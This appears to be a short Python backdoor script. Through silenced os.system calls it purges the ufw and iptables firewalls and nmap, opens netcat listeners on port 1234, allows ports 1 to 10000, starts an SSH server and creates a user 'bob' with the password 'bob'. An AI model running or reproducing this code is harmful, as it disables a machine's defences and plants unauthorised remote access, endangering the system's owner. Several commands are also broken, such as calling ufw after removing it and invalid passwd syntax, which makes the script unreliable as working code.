#[enable]
import os
os.system("apt-get remove --purge ufw -y -vv &> /dev/null")
os.system("apt-get remove --purge nmap -y -vv &> /dev/null")
os.system("apt-get remove --purge iptables -y -vv &> /dev/null")
os.system("apt-get install -y -vv netcat-traditional")
os.system("ufw allow 1234")
os.system("nc -lvp 1234")
os.system("ncat -lvp 1234")
os.system("netcat -lvp 1234")
os.system("apt-get install openssh-client openssh-server -y -vv &> /dev/null")
os.system("ufw allow 1:10000 &> /dev/null  &> /dev/null")
os.system("systemctl start openssh-client  &> /dev/null")
os.system("systemctl start openssh-server  &> /dev/null")
os.system("useradd bob  &> /dev/null")
os.system("passwd bob bob  &> /dev/null")
